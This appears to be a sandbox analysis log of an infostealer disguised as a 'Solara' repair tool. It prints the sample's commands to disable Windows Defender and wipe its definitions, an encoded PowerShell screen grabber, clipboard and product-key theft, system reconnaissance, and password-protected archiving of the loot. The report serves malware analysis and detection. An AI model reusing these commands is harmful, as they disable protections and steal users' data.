              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AEFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70AEFD19C
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AF134F0 GetProcessHeap,0_2_00007FF70AF134F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AEFD37C SetUnhandledExceptionFilter,0_2_00007FF70AEFD37C
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AEFC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF70AEFC910
              Source: C:\Users\user\Desktop\cmd.exe Code function: 0_2_00007FF70AF0A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70AF0A684
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A444C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF69A444C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A43B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF69A43B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A43A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,65_2_00007FF69A43A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe Code function: 65_2_00007FF69A43B6D8 SetUnhandledExceptionFilter,65_2_00007FF69A43B6D8

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
